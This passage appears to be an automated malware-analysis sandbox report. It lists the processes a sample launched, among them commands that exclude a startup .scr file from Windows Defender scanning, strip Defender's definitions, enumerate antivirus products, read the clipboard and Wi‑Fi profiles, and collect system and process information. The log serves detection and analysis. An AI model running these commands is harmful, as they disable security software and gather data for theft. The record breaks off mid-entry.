                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                      Start time:13:36:57
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                      Start time:13:36:57
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                      Imagebase:0x7ff76f8a0000
                                                                                                                                                                                                                                      File size:77'312 bytes
                                                                                                                                                                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                      Start time:13:36:58
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                      Start time:13:36:58
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                      Start time:13:36:58
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                      Imagebase:0x7ff76f8a0000
                                                                                                                                                                                                                                      File size:77'312 bytes
                                                                                                                                                                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                                                      Start time:13:36:58
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                      Start time:13:36:58
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                      Start time:13:36:58
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                      Imagebase:0x7ff719d10000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                      Start time:13:36:59
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                      Start time:13:36:59
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                      Start time:13:36:59
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                      Imagebase:0x7ff719d10000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                      Start time:13:37:00
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                      Start time:13:37:00
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                                                      Start time:13:37:00
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                                                      Start time:13:37:00
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                      Imagebase:0x7ff684790000
                                                                                                                                                                                                                                      File size:468'120 bytes
                                                                                                                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:55
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:56
                                                                                                                                                                                                                                      Start time:13:37:02
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:57
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff79c5e0000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:58
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:59
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:60
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:61
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:62
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:63
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:64
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:65
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:66
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff79c5e0000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:67
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff786950000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:68
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                      Imagebase:0x7ff719d10000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:69
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:netsh wlan show profile
                                                                                                                                                                                                                                      Imagebase:0x7ff61c4c0000
                                                                                                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:70
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff79c5e0000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:71
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-Clipboard
